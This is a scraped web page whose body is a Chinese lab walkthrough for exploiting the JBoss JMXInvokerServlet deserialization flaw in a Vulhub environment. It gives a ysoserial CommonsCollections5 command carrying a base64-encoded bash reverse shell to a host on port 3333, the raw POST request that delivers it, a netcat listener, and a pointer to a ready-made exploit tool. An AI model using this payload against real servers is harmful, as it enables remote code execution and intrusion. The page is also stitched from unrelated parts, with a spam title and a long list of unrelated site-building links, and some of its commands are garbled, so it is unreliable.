当前位置: 首页 > news >正文

网站 被攻击_主业篡改 被黑了 织梦做的站电子商务网站有哪几种

网站 被攻击_主业篡改 被黑了 织梦做的站,电子商务网站有哪几种,品牌查询网站,百度站长工具seo查询JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程漏洞原理 复现过程启动环境端口设置浏览器设置BurpSuit设置 复现漏洞序列化数据生成发送POCEXP Vulnhub官方复现教程 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ 漏洞原理 这… JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程漏洞原理 复现过程启动环境端口设置浏览器设置BurpSuit设置 复现漏洞序列化数据生成发送POCEXP Vulnhub官方复现教程 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ 漏洞原理 这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象然后我们利用Apache Commons Collections中的Gadget执行任意代码。 参考文档 https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/https://www.seebug.org/vuldb/ssvid-89723http://www.freebuf.com/sectool/88908.htmlhttps://paper.seebug.org/312/ 复现过程 启动环境 https://blog.csdn.net/JiangBuLiu/article/details/93853056 进入路径为 cd /root/vulhub/jboss/JMXInvokerServlet-deserialization搭建及运行漏洞环境 docker-compose build docker-compose up -d用时4分钟 环境启动后访问http://your-ip:8080/即可看到JBoss默认页面。 端口设置 浏览器设置 以火狐浏览器FireFox为例在选项→常规→网络设置→设置将连接中手动代理配置的HTTP代理填写127.0.0.1端口为8080 BurpSuit设置 在Proxy下Options的Proxy Listeners编辑监听端口为8080 并将Proxy下Intercept点击成Intercept is on 复现漏洞 JBoss在处理/invoker/JMXInvokerServlet请求的时候读取了对象所以我们直接将ysoserial生成好的POC附在POST Body中发送即可。整个过程可参考jboss/CVE-2017-12149。 序列化数据生成 使用ysoserial来复现生成序列化数据由于Vulhub使用的Java版本较新所以选择使用的gadget是CommonsCollections5 java -jar ysoserial.jar CommonsCollections5 bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xMjcuMC4wLjEvMzMzMyAwPiYx}|{base64,-d}|{bash,-i} poc.ser【注意】上面POC中{}内base64的编码原内容为bash -i /dev/tcp/192.168.236.138/3333 01 【注意注意】ysoserial不要用Powershell一定要用cmd 发送POC 生成好的POC文件.ser将这个文件作为POST Body发送至/invoker/JMXInvokerServlet即可 POST /invoker/JMXInvokerServlet HTTP/1.1 Host: 192.168.236.138:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-java-serialized-object Content-Length: 4240【右击选择上传文件选中POC上传】 比如我POC中的命令是监听端口那么就检测对应端口 nv -lvnp [端口号]EXP 网上已经有很多EXP了比如DeserializeExploit.jar 直接用该工具执行命令、上传文件即可
http://www.huolong8.cn/news/208859/

相关文章:

  • 麻涌镇网站建设公司网站运维
  • 建设网站教学wordpress修改没
  • 郑州营销型网站制作自建网站如何上传视频
  • 杭州 seo网站建设 网络服务黄岛网站建设价格
  • 网站建商城网页设计图片代码怎么写
  • 网站更改关键词设计感 网站
  • 网站里 动效是用什么做的无锡seo网站排名
  • 北京政平建设投资集团有限公司网站电商网站建设与开发课程试卷
  • 单位建设网站需要招标潜江做网站的公司
  • 网站特效 素材wordpress文章更新
  • 做搜狐网站页面网络营销师培训费用是多少
  • 做响应式网站的微博号小学门户网站建设情况汇报
  • 网站的建设意见网页紧急升级维护中升级
  • 重庆企业网站昆山网站制作哪家强
  • 头疼是什么原因导致的seo实战培训
  • 网站代码制作河北省住宅和城乡建设厅网站
  • 公众平台如何做网站汽车网络营销方式
  • 网站排版中铁三局招聘2022
  • Wordpress网站能做seo吗宁波网站建设公司名单推荐
  • 常州手机网站开发网站的ftp帐号密码
  • 网站建设公司黄页wordpress seo 百度
  • 网站设计建设网站做网站 哪里发布
  • 有网站源码如何搭建自己的网站网络营销app有哪些
  • 惠州技术支持网站建设手机网站制作招聘
  • 免费自建网站工具网站建设好后能修改吗
  • 没有备案的网站怎么挂广告建站系统多少钱
  • 长沙武广新城建设网站广东广州免费建站
  • 做seo网站优化价格wordpress会员推广插件
  • 北京怀柔网站建设公司动画设计思路怎么写
  • 魅族的网站建设与安全医疗网站建设哪个好用